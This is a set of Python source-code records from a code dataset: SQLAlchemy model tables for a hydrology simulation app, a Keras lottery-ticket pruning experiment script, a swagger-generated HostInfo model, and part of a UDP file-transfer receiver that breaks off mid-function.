__tablename__ = 'model_inputs_table'\n\n # Columns\n id = Column(Integer, primary_key=True)\n children = relationship(\"model_calibration_table\")\n\n user_name = Column(Text)\n simulation_name = Column(Text)\n simulation_folder = Column(Text)\n cell_size = Column(Float)\n timestep = Column(Float)\n outlet_lat = Column(Float)\n outlet_lon = Column(Float)\n box_topY = Column(Float)\n box_bottomY = Column(Float)\n box_rightX = Column(Float)\n box_leftX = Column(Float)\n simulation_start_date = Column(Date)\n simulation_end_date = Column(Date)\n timeseries_source = Column(Text)\n threshold = Column(Float)\n USGS_gage = Column(Integer)\n\n\n def __init__(self, user_name, simulation_folder, simulation_name, cell_size,timestep,outlet_lat,outlet_lon, box_topY,box_bottomY,\n box_rightX,box_leftX, simulation_start_date, simulation_end_date , timeseries_source, threshold, USGS_gage ):\n \"\"\"\n Constructor for a gage\n \"\"\"\n self.simulation_folder = simulation_folder\n self.user_name = user_name\n self.simulation_name = simulation_name\n self.cell_size = cell_size\n self.timestep = timestep\n self.outlet_lat = outlet_lat\n self.outlet_lon = outlet_lon\n self.box_topY = box_topY\n self.box_bottomY = box_bottomY\n self.box_rightX = box_rightX\n self.box_leftX = box_leftX\n self.simulation_start_date = simulation_start_date\n self.simulation_end_date = simulation_end_date\n self.timeseries_source = timeseries_source\n self.threshold = threshold\n self.USGS_gage = USGS_gage\n\n\n\nclass 
model_calibration_table(Base):\n '''\n Example SQLAlchemy DB Model\n '''\n __tablename__ = 'model_calibration_table'\n\n # Columns\n id = Column(Integer, primary_key=True)\n\n model_run_id = Column(Integer, ForeignKey('model_inputs_table.id'))\n\n fac_L_form = Column(Float)\n fac_Ks_form = Column(Float)\n fac_n_o_form = Column(Float)\n fac_n_c_form = Column(Float)\n fac_th_s_form = Column(Float)\n\n pvs_t0_form = Column(Float)\n vo_t0_form = Column(Float)\n qc_t0_form = Column(Float)\n kc_form = Column(Float)\n\n\n def __init__(self,model_run_id, fac_L_form,fac_Ks_form, fac_n_o_form, fac_n_c_form,fac_th_s_form ,\n pvs_t0_form,vo_t0_form, qc_t0_form,kc_form ):\n \"\"\"\n Constructor for a gage\n \"\"\"\n self.model_run_id = model_run_id\n self.fac_L_form = fac_L_form\n self.fac_Ks_form = fac_Ks_form\n self.fac_n_o_form = fac_n_o_form\n self.fac_n_c_form = fac_n_c_form\n self.fac_th_s_form = fac_th_s_form\n\n self.pvs_t0_form = pvs_t0_form\n self.vo_t0_form = vo_t0_form\n self.qc_t0_form = qc_t0_form\n self.kc_form = kc_form\n\n\n","sub_path":"tethysapp-my_first_app/tethysapp/my_first_app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"459122042","text":"\"\"\"\nAn example of how to evaluate a classically trained CNN and a CNN trained using Lottery Ticket pruning.\nThis same can be readily adapted for other models including DNNs.\n\"\"\"\nimport argparse\nimport collections\nimport json\nimport math\nimport os\n\nimport tensorflow.keras as keras\nfrom tensorflow.keras.datasets import cifar10, mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom tensorflow.keras import backend as K\n\nimport numpy as np\nimport pandas as pd\n\nimport lottery_ticket_pruner\n\n\nclass LoggingCheckpoint(keras.callbacks.Callback):\n \"\"\" A keras checkpoint that is used during training to capture the test and validation losses and accuracies.\n This allows comparison between normal (unpruned) training and lottery ticket pruning on an epoch by epoch basis.\n \"\"\"\n def __init__(self, experiment):\n super().__init__()\n self.reset(experiment)\n\n def on_epoch_end(self, epoch, logs=None):\n super().on_epoch_end(epoch, logs)\n if epoch not in self.epoch_data:\n self.epoch_data[epoch] = collections.OrderedDict()\n self.epoch_data[epoch][self.experiment] = logs\n\n def reset(self, experiment):\n self.experiment = experiment\n self.epoch_data = {}\n\n\nclass Dataset(object):\n def __init__(self, which_set='mnist'):\n # The MNIST and CIFAR10 datasets each have 10 classes\n self.num_classes = 10\n # the data, split between train and test sets\n func_map = {'mnist': self.load_mnist_data,\n 'cifar10': self.load_cifar10_data,\n 'cifar10_reduced_10x': self.load_cifar10_reduced_10x_data}\n if which_set in func_map:\n (x_train, y_train), (x_test, y_test) = func_map[which_set]()\n else:\n raise ValueError('`which_set` must be one of {} but it was {}'.format(func_map.keys(), which_set))\n\n if K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], self.channels, self.img_rows, self.img_cols)\n x_test = x_test.reshape(x_test.shape[0], self.channels, self.img_rows, self.img_cols)\n self.input_shape = (self.channels, self.img_rows, self.img_cols)\n else:\n x_train = x_train.reshape(x_train.shape[0], self.img_rows, self.img_cols, self.channels)\n x_test = 
x_test.reshape(x_test.shape[0], self.img_rows, self.img_cols, self.channels)\n self.input_shape = (self.img_rows, self.img_cols, self.channels)\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n print('x_train shape:', x_train.shape)\n print(x_train.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n y_train = keras.utils.to_categorical(y_train, self.num_classes)\n y_test = keras.utils.to_categorical(y_test, self.num_classes)\n\n self.x_train, self.y_train, self.x_test, self.y_test = x_train, y_train, x_test, y_test\n\n def load_cifar10_data(self):\n \"\"\" Initialize the instance for training with the full CIFAR dataset.\n :returns The CIFAR dataset divided up into training, testing samples.\n (X train, y train, X test, y test)\n \"\"\"\n # input image dimensions\n self.img_rows, self.img_cols = 32, 32\n self.channels = 3\n\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n return (x_train, y_train), (x_test, y_test)\n\n def load_cifar10_reduced_10x_data(self):\n \"\"\" Initialize the instance for training with 1/10th of the samples in the CIFAR dataset.\n :returns 1/10th of the CIFAR dataset divided up into training, testing samples.\n (X train, y train, X test, y test)\n \"\"\"\n (x_train, y_train), (x_test, y_test) = self.load_cifar10_data()\n\n def get_first_n(X, y, classes, n):\n result = []\n # Accumulate the first N samples of each class\n for cls in classes:\n first_n = np.where(y == cls)[0][:n]\n result.extend(first_n)\n # Now put them back into the original order\n result = sorted(result)\n X = X[result]\n y = y[result]\n return X, y\n\n # Reduce overall size of train, test sets by 10x\n x_train, y_train = get_first_n(x_train, y_train, range(self.num_classes),\n x_train.shape[0] // (self.num_classes * 10))\n x_test, y_test = get_first_n(x_test, y_test, range(self.num_classes),\n x_test.shape[0] // (self.num_classes * 10))\n return (x_train, y_train), (x_test, y_test)\n\n def load_mnist_data(self):\n \"\"\" Initialize the instance for training with the MNIST dataset.\n :returns The MNIST dataset divided up into training, testing samples.\n (X train, y train, X test, y test)\n \"\"\"\n # input image dimensions\n self.img_rows, self.img_cols = 28, 28\n self.channels = 1\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n return (x_train, y_train), (x_test, y_test)\n\n\nclass MNIST(object):\n \"\"\" A class that can be used to create, train and evaluate a model on the MNIST or CIFAR10 datasets.\n \"\"\"\n def __init__(self, experiment, which_set='mnist'):\n self.batch_size = 128\n self.dataset = Dataset(which_set=which_set)\n\n self.experiment = experiment\n self.logging_callback = LoggingCheckpoint(experiment)\n self.callbacks = [self.logging_callback, keras.callbacks.EarlyStopping(patience=3, verbose=1)]\n\n def create_model(self):\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=self.dataset.input_shape))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(self.dataset.num_classes, activation='softmax'))\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer='adadelta',\n # optimizer=keras.optimizers.Adadelta(), this doesn't work across TF 1.x, TF 2.x\n metrics=['accuracy'])\n return 
model\n\n def fit(self, model, epochs):\n self.logging_callback.reset(self.experiment)\n model.fit(self.dataset.x_train, self.dataset.y_train,\n batch_size=self.batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(self.dataset.x_test, self.dataset.y_test),\n callbacks=self.callbacks)\n\n def evaluate(self, model):\n loss, accuracy = model.evaluate(self.dataset.x_test, self.dataset.y_test, verbose=0)\n return float(loss), float(accuracy)\n\n def get_epoch_logs(self):\n \"\"\" Returns a dict of each epoch's accuracy, loss, validation accuracy, validation loss.\n result[][]['loss']\n result[][]['acc']\n result[][]['val_loss']\n result[][]['val_acc']\n \"\"\"\n return self.logging_callback.epoch_data\n\n\nclass MNISTPruned(MNIST):\n \"\"\" A class that can be used to create, train and evaluate a model on the MNIST or CIFAR10 datasets.\n When training the model this class will apply lottery ticket pruning after every epoch.\n \"\"\"\n def __init__(self, experiment, pruner, use_dwr=False, which_set='mnist'):\n \"\"\"\n :param experiment: A string that describes the experiment being evaluated.\n :param pruner: A `LotteryTicketPruner` instance that is used to prune the weights after every epoch of training.\n :param use_dwr: If True then the callback will apply Dynamic Weight Rescaling (DWR) to the unpruned weights in\n the model after every epoch.\n See section 5.2, \"Dynamic Weight Rescaling\" of https://arxiv.org/pdf/1905.01067.pdf.\n A quote from that paper describes it best:\n \"For each training iteration and for each layer, we multiply the underlying weights by the ratio of the\n total number of weights in the layer over the number of ones in the corresponding mask.\"\n :param which_set: One of 'mnist', 'cifar10', 'cifar10_reduced_10x'.\n See `evaluate()` for more info on what these mean.\n \"\"\"\n super().__init__(experiment, which_set=which_set)\n self.pruner = pruner\n self.use_dwr = use_dwr\n\n def fit(self, model, epochs):\n callbacks = self.callbacks + [lottery_ticket_pruner.PrunerCallback(self.pruner, use_dwr=self.use_dwr)]\n model.fit(self.dataset.x_train, self.dataset.y_train,\n batch_size=self.batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(self.dataset.x_test, self.dataset.y_test),\n callbacks=callbacks)\n\n\ndef _merge_epoch_logs(epoch_logs, epoch_logs2):\n \"\"\" Due to using early stopping it's possible that training some models takes more epochs than others.\n So we need to merge the epoch logs (training x validation, loss x accuracy) from across all the epochs.\n \"\"\"\n for epoch, logs_dict in epoch_logs2.items():\n if epoch not in epoch_logs:\n epoch_logs[epoch] = logs_dict\n else:\n epoch_logs[epoch].update(logs_dict)\n return epoch_logs\n\n\ndef _to_floats(d):\n \"\"\" Walk through the dict and make sure all values are floats and not np.float32 or np.float64 since the latter\n cannot be serialized to json.\n \"\"\"\n for k, v in d.items():\n if isinstance(v, dict):\n _to_floats(v)\n elif isinstance(v, (np.float16, np.float32, np.float64)):\n d[k] = float(v)\n\n\ndef evaluate(which_set, prune_strategy, use_dwr, epochs, output_dir):\n \"\"\" Evaluates multiple training approaches:\n A model with randomly initialized weights evaluated with no training having been done\n A model trained from randomly initialized weights\n A model with randomly initialized weights evaluated with no training having been done *but* lottery ticket\n pruning has been done prior to evaluation.\n Several models trained from randomly initialized weights *but* with lottery 
ticket pruning applied at the\n end of every epoch.\n :param which_set: One of 'mnist', 'cifar10', 'cifar10_reduced_10x'.\n 'mnist' is the standard MNIST data set (70k total images of digits 0-9).\n 'cifar10' is the standard CIFAR10 data set (60k total images in 10 classes, 6k images/class)\n 'cifar10_reduced_10x' is just like 'cifar10' but with the total training, test sets reduced by 10x.\n (6k total images in 10 classes, 600 images/class).\n This is useful for seeing the effects of lottery ticket pruning on a smaller dataset.\n :param prune_strategy: One of the strategies supported by `LotteryTicketPruner.calc_prune_mask()`\n A string indicating how the pruning should be done.\n 'random': Pruning is done randomly across all prunable layers.\n 'smallest_weights': The smallest weights at each prunable layer are pruned. Each prunable layer has the\n specified percentage pruned from the layer's weights.\n 'smallest_weights_global': The smallest weights across all prunable layers are pruned. Some layers may\n have substantially more or less weights than `prune_percentage` pruned from them. But overall,\n across all prunable layers, `prune_percentage` weights will be pruned.\n 'large_final': Keeps the weights that have the largest magnitude from the previously trained model.\n This is 'large_final' as defined in https://arxiv.org/pdf/1905.01067.pdf\n :param boolean use_dwr: Whether or not to apply Dynamic Weight Rescaling (DWR) to the unpruned weights in the\n model.\n See section 5.2, \"Dynamic Weight Rescaling\" of https://arxiv.org/pdf/1905.01067.pdf.\n A quote from that paper describes it best:\n \"For each training iteration and for each layer, we multiply the underlying weights by the ratio of the\n total number of weights in the layer over the number of ones in the corresponding mask.\"\n :param epochs: The number of epochs to train the models for.\n :param output_dir: The directory to put output files.\n :returns losses and accuracies for the evaluations. 
Each is a dict keyed by experiment name and whose value\n is the loss/accuracy.\n \"\"\"\n losses = {}\n accuracies = {}\n\n experiment = 'MNIST'\n mnist = MNIST(experiment, which_set=which_set)\n model = mnist.create_model()\n starting_weights = model.get_weights()\n\n pruner = lottery_ticket_pruner.LotteryTicketPruner(model)\n\n experiment = 'no_training'\n losses[experiment], accuracies[experiment] = mnist.evaluate(model)\n\n experiment = 'MNIST'\n mnist.fit(model, epochs)\n trained_weights = model.get_weights()\n losses[experiment], accuracies[experiment] = mnist.evaluate(model)\n epoch_logs = mnist.get_epoch_logs()\n pruner.set_pretrained_weights(model)\n\n # Evaluate performance of model with original weights and pruning applied\n num_prune_rounds = 4\n prune_rate = 0.2\n overall_prune_rate = 0.0\n for i in range(num_prune_rounds):\n prune_rate = pow(prune_rate, 1.0 / (i + 1))\n overall_prune_rate = overall_prune_rate + prune_rate * (1.0 - overall_prune_rate)\n\n # Make sure each iteration of pruning uses the same trained weights to determine pruning mask\n model.set_weights(trained_weights)\n pruner.calc_prune_mask(model, prune_rate, prune_strategy)\n # Now revert model to original random starting weights and apply pruning\n model.set_weights(starting_weights)\n pruner.apply_pruning(model)\n\n experiment = 'no_training_pruned@{:.4f}'.format(overall_prune_rate)\n losses[experiment], accuracies[experiment] = mnist.evaluate(model)\n\n pruner.reset_masks()\n\n # Calculate pruning mask below using trained weights\n model.set_weights(trained_weights)\n\n # Now train from original weights and prune during training\n prune_rate = 0.2\n overall_prune_rate = 0.0\n for i in range(num_prune_rounds):\n prune_rate = pow(prune_rate, 1.0 / (i + 1))\n overall_prune_rate = overall_prune_rate + prune_rate * (1.0 - overall_prune_rate)\n\n # Calculate the pruning mask using the trained model and its final trained weights\n pruner.calc_prune_mask(model, prune_rate, prune_strategy)\n\n # Now create a new model that has the original random starting weights and train it\n experiment = 'pruned@{:.4f}'.format(overall_prune_rate)\n mnist_pruned = MNISTPruned(experiment, pruner, use_dwr=use_dwr, which_set=which_set)\n prune_trained_model = mnist_pruned.create_model()\n prune_trained_model.set_weights(starting_weights)\n mnist_pruned.fit(prune_trained_model, epochs)\n losses[experiment], accuracies[experiment] = mnist_pruned.evaluate(prune_trained_model)\n\n epoch_logs = _merge_epoch_logs(epoch_logs, mnist_pruned.get_epoch_logs())\n _to_floats(epoch_logs)\n\n # Periodically save the results to allow inspection during these multiple lengthy iterations\n with open(os.path.join(output_dir, 'epoch_logs.json'), 'w') as f:\n json.dump(epoch_logs, f, indent=4)\n\n # Now save csv file so it's easier to compare loss, accuracy across the experiments\n headings = []\n for experiment in epoch_logs[0].keys():\n headings.extend([experiment, '', '', ''])\n sub_headings = ['train_loss', 'train_acc', 'val_loss', 'val_acc'] * len(epoch_logs[0])\n epoch_logs_df = pd.DataFrame([], columns=[headings, sub_headings])\n all_keys = set(epoch_logs[0].keys())\n for epoch, epoch_results in epoch_logs.items():\n row = []\n for experiment in all_keys:\n if experiment in epoch_results:\n exp_dict = epoch_logs[epoch][experiment]\n row.extend([exp_dict['loss'], exp_dict['acc'], exp_dict['val_loss'], exp_dict['val_acc']])\n else:\n row.extend([math.nan, math.nan, math.nan, math.nan])\n\n epoch_logs_df.loc[epoch] = row\n 
epoch_logs_df.to_csv(os.path.join(output_dir, 'epoch_logs.csv'))\n\n return losses, accuracies\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--iterations', type=int, required=True, default=1,\n help='How many iterations to do. The final results will be averaged over these iterations.')\n parser.add_argument('--epochs', type=int, required=False, default=20,\n help='How many epochs to train for.')\n parser.add_argument('--which_set', type=str, required=False, default='mnist',\n help='Which data set to use. Must be one of \"mnist\", \"cifar10\" or \"cifar10_reduced_10x\". '\n '\"cifar10_reduced_10x\" is the cifar10 data set with 10x fewer training, test samples. This is '\n 'useful for evaluating these pruning strategies using less data')\n parser.add_argument('--prune_strategy', type=str, required=False, default='smallest_weights_global',\n help='Which pruning strategy to use. Must be one of \"random\", \"smallest_weights\", \"smallest_weights_global\". '\n 'See docs for LotteryTicketPruner.calc_prune_mask() for full details.')\n parser.add_argument('--dwr', action='store_true',\n help='Dynamic Weight Rescaling. Specify this to have unpruned weights rescaled after pruning is done.')\n args = parser.parse_args()\n\n base_output_dir = os.path.dirname(__file__)\n\n for i in range(args.iterations):\n output_dir = os.path.join(base_output_dir, '{}_{}_{}_{}'.format(args.which_set, args.prune_strategy,\n args.epochs, i))\n os.makedirs(output_dir, exist_ok=True)\n losses, accuracies = evaluate(args.which_set, args.prune_strategy, args.dwr, args.epochs, output_dir)\n\n if i == 0:\n # Only add headings once per every two sub-headings to reduce verbosity\n headings = []\n for key in losses.keys():\n headings.extend([key, ''])\n sub_headings = ['loss', 'acc'] * len(losses)\n results_df = pd.DataFrame([], columns=[headings, sub_headings])\n row = []\n for key in losses.keys():\n row.extend([losses[key], accuracies[key]])\n results_df.loc[i] = row\n\n results_df.to_csv(os.path.join(base_output_dir,\n '{}_{}{}_{}_results.csv'.format(args.which_set, args.prune_strategy,\n '_dwr' if args.dwr else '', args.epochs)))\n print(results_df)\n\n mean = results_df.mean(axis=0)\n results_df.loc['average'] = mean\n results_df.to_csv(os.path.join(base_output_dir, '{}_{}{}_{}_results.csv'.format(args.which_set, args.prune_strategy,\n '_dwr' if args.dwr else '',\n args.epochs)))\n print(results_df)\n","sub_path":"examples/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":20033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"320337138","text":"# coding: utf-8\n\n\"\"\"\n ML Lab Service\n\n Functionality to create and manage Lab projects, services, datasets, models, and experiments. 
# noqa: E501\n\n OpenAPI spec version: 3.0.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass HostInfo(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'hostname': 'str',\n 'os': 'str',\n 'cpu': 'str',\n 'cpu_cores': 'str',\n 'memory_size': 'str',\n 'python_version': 'str',\n 'python_compiler': 'str',\n 'python_impl': 'str',\n 'workspace_version': 'str',\n 'gpus': 'list[str]'\n }\n\n attribute_map = {\n 'hostname': 'hostname',\n 'os': 'os',\n 'cpu': 'cpu',\n 'cpu_cores': 'cpuCores',\n 'memory_size': 'memorySize',\n 'python_version': 'pythonVersion',\n 'python_compiler': 'pythonCompiler',\n 'python_impl': 'pythonImpl',\n 'workspace_version': 'workspaceVersion',\n 'gpus': 'gpus'\n }\n\n def __init__(self, hostname=None, os=None, cpu=None, cpu_cores=None, memory_size=None, python_version=None, python_compiler=None, python_impl=None, workspace_version=None, gpus=None): # noqa: E501\n \"\"\"HostInfo - a model defined in Swagger\"\"\" # noqa: E501\n\n self._hostname = None\n self._os = None\n self._cpu = None\n self._cpu_cores = None\n self._memory_size = None\n self._python_version = None\n self._python_compiler = None\n self._python_impl = None\n self._workspace_version = None\n self._gpus = None\n self.discriminator = None\n\n if hostname is not None:\n self.hostname = hostname\n if os is not None:\n self.os = os\n if cpu is not None:\n self.cpu = cpu\n if cpu_cores is not None:\n self.cpu_cores = cpu_cores\n if memory_size is not None:\n self.memory_size = memory_size\n if python_version is not None:\n self.python_version = python_version\n if python_compiler is not None:\n self.python_compiler = python_compiler\n if python_impl is not None:\n self.python_impl = python_impl\n if workspace_version is not None:\n self.workspace_version = workspace_version\n if gpus is not None:\n self.gpus = gpus\n\n @property\n def hostname(self):\n \"\"\"Gets the hostname of this HostInfo. # noqa: E501\n\n\n :return: The hostname of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._hostname\n\n @hostname.setter\n def hostname(self, hostname):\n \"\"\"Sets the hostname of this HostInfo.\n\n\n :param hostname: The hostname of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._hostname = hostname\n\n @property\n def os(self):\n \"\"\"Gets the os of this HostInfo. # noqa: E501\n\n\n :return: The os of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._os\n\n @os.setter\n def os(self, os):\n \"\"\"Sets the os of this HostInfo.\n\n\n :param os: The os of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._os = os\n\n @property\n def cpu(self):\n \"\"\"Gets the cpu of this HostInfo. # noqa: E501\n\n\n :return: The cpu of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._cpu\n\n @cpu.setter\n def cpu(self, cpu):\n \"\"\"Sets the cpu of this HostInfo.\n\n\n :param cpu: The cpu of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._cpu = cpu\n\n @property\n def cpu_cores(self):\n \"\"\"Gets the cpu_cores of this HostInfo. # noqa: E501\n\n\n :return: The cpu_cores of this HostInfo. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._cpu_cores\n\n @cpu_cores.setter\n def cpu_cores(self, cpu_cores):\n \"\"\"Sets the cpu_cores of this HostInfo.\n\n\n :param cpu_cores: The cpu_cores of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._cpu_cores = cpu_cores\n\n @property\n def memory_size(self):\n \"\"\"Gets the memory_size of this HostInfo. # noqa: E501\n\n\n :return: The memory_size of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._memory_size\n\n @memory_size.setter\n def memory_size(self, memory_size):\n \"\"\"Sets the memory_size of this HostInfo.\n\n\n :param memory_size: The memory_size of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._memory_size = memory_size\n\n @property\n def python_version(self):\n \"\"\"Gets the python_version of this HostInfo. # noqa: E501\n\n\n :return: The python_version of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._python_version\n\n @python_version.setter\n def python_version(self, python_version):\n \"\"\"Sets the python_version of this HostInfo.\n\n\n :param python_version: The python_version of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._python_version = python_version\n\n @property\n def python_compiler(self):\n \"\"\"Gets the python_compiler of this HostInfo. # noqa: E501\n\n\n :return: The python_compiler of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._python_compiler\n\n @python_compiler.setter\n def python_compiler(self, python_compiler):\n \"\"\"Sets the python_compiler of this HostInfo.\n\n\n :param python_compiler: The python_compiler of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._python_compiler = python_compiler\n\n @property\n def python_impl(self):\n \"\"\"Gets the python_impl of this HostInfo. # noqa: E501\n\n\n :return: The python_impl of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._python_impl\n\n @python_impl.setter\n def python_impl(self, python_impl):\n \"\"\"Sets the python_impl of this HostInfo.\n\n\n :param python_impl: The python_impl of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._python_impl = python_impl\n\n @property\n def workspace_version(self):\n \"\"\"Gets the workspace_version of this HostInfo. # noqa: E501\n\n\n :return: The workspace_version of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._workspace_version\n\n @workspace_version.setter\n def workspace_version(self, workspace_version):\n \"\"\"Sets the workspace_version of this HostInfo.\n\n\n :param workspace_version: The workspace_version of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._workspace_version = workspace_version\n\n @property\n def gpus(self):\n \"\"\"Gets the gpus of this HostInfo. # noqa: E501\n\n\n :return: The gpus of this HostInfo. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._gpus\n\n @gpus.setter\n def gpus(self, gpus):\n \"\"\"Sets the gpus of this HostInfo.\n\n\n :param gpus: The gpus of this HostInfo. 
# noqa: E501\n :type: list[str]\n \"\"\"\n\n self._gpus = gpus\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(HostInfo, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, HostInfo):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"services/lab-workspace/docker-res/duplicated-resources/ml-lab-py/lab_api/swagger_client/models/host_info.py","file_name":"host_info.py","file_ext":"py","file_size_in_byte":9125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"2777398","text":"import sys, socket, random\nfrom stp_packet import StpPacket\nimport log_helper\n\n\nDEBUG_MODE = False\n# argv\nargv_port = ''\nargv_filename = ''\n# statistics\nnum_received_bytes = 0\nnum_seg = 0\nnum_data_seg = 0\nnum_data_error = 0\nnum_dup_data_seg = 0\nnum_dup_ack = 0\n\n\ndef parse_argv():\n global DEBUG_MODE\n global argv_port\n global argv_filename\n\n if len(sys.argv) != 3:\n print('Usage:' +\n 'python receiver.py receiver_port output_file_name')\n sys.exit(1)\n\n argv_port = int(sys.argv[1])\n argv_filename = sys.argv[2]\n\n\ndef wait_for_handshake(udp_socket):\n global DEBUG_MODE\n global argv_port\n global num_seg\n\n data, address = udp_socket.recvfrom(argv_port)\n log_helper.init('Receiver_log.txt')\n num_seg += 1\n packet1 = StpPacket()\n packet1.from_byte_array(data)\n log_helper.log_packet('rcv', packet1)\n\n client_isn = packet1.sequenceNum\n\n # Base on the sample log, it seems that we do need to use random server_isn\n # server_isn = random.randint(0, 2 ** 32)\n server_isn = 0\n if not(packet1.isValid and packet1.isSyn and packet1.ackNum == 0):\n print('Receiver: Connection error')\n sys.exit(1)\n\n # Send ACK\n packet2 = StpPacket()\n packet2.isSyn = True\n packet2.sequenceNum = server_isn\n packet2.ackNum = client_isn + 1\n udp_socket.sendto(packet2.to_byte_array(), address)\n log_helper.log_packet('snd', packet2)\n\n # Receive ACK\n data, _ = udp_socket.recvfrom(argv_port)\n num_seg += 1\n packet3 = StpPacket()\n packet3.from_byte_array(data)\n log_helper.log_packet('rcv', packet3)\n if not(packet3.isValid and packet3.sequenceNum == client_isn + 1 and packet3.ackNum == server_isn + 1):\n print('Receiver: Connection error')\n sys.exit(1)\n\n if DEBUG_MODE:\n print('Receiver: handshake success')\n return client_isn, server_isn\n\n\ndef receive_file(udp_socket, client_isn, server_isn):\n global DEBUG_MODE\n global argv_filename\n global argv_port\n global num_received_bytes\n global num_seg\n global num_data_seg\n global num_data_error\n 
global num_dup_data_seg\n global num_dup_ack\n\n if DEBUG_MODE:\n print('Start Receive File')\n\n packets_window = []\n WINDOW_SIZE = 10\n next_seq_num = 0\n with open(argv_filename, 'wb') as f:\n while True:\n try:\n data, sender_address = udp_socket.recvfrom(argv_port)\n num_seg += 1\n\n p = StpPacket()\n p.from_byte_array(data)\n log_helper.log_packet('rcv', p)\n if not p.isFin:\n num_data_seg += 1\n if not p.isValid:\n num_data_error += 1\n\n if not p.isValid:\n # Any segment that is found corrupted is discarded at\n # the receiver without generating a duplicate Ack.\n continue\n\n if p.isFin:\n f.close()\n tear_down(udp_socket, sender_address, p, client_isn, server_isn, next_seq_num)\n break\n else:\n # we do not count the segment into data segment if it is invalid\n\n if next_seq_num == p.sequenceNum - client_isn - 1:\n if DEBUG_MODE:\n print(\"receiver: receive \" + str(next_seq_num))\n f.write(p.data)\n next_seq_num += len(p.data)\n\n while True:\n next_packet = None\n for p in packets_window:\n if p.sequenceNum - client_isn - 1 == next_seq_num:\n next_packet = p\n break\n if next_packet is None:\n break\n else:\n packets_window.remove(next_packet)\n f.write(next_packet.data)\n next_seq_num += len(next_packet.data)\n\n num_received_bytes = next_seq_num\n\n # send ACK\n ack_packet = StpPacket()\n ack_packet.isAck = True\n ack_packet.ackNum = next_seq_num + server_isn + 1\n udp_socket.sendto(ack_packet.to_byte_array(), sender_address)\n log_helper.log_packet('snd', ack_packet)\n else:\n if p.sequenceNum < next_seq_num:\n # Duplicate data segments\n num_dup_data_seg += 1\n # reacknowledge\n num_dup_ack += 1\n ack_packet = StpPacket()\n ack_packet.isAck = True\n ack_packet.ackNum = next_seq_num + server_isn + 1\n udp_socket.sendto(ack_packet.to_byte_array(), sender_address)\n log_helper.log_packet('snd', ack_packet)\n\n packets_window.append(p)\n if len(packets_window) >= WINDOW_SIZE:\n packets_window.pop(0)\n except socket.timeout:\n print(\"Receiver: Connection Timeout\")\n sys.exit(0)\n\n\ndef tear_down(udp_socket, address, p1, client_isn, server_isn, final_seq_no):\n global argv_port\n global DEBUG_MODE\n global num_seg\n\n if DEBUG_MODE:\n 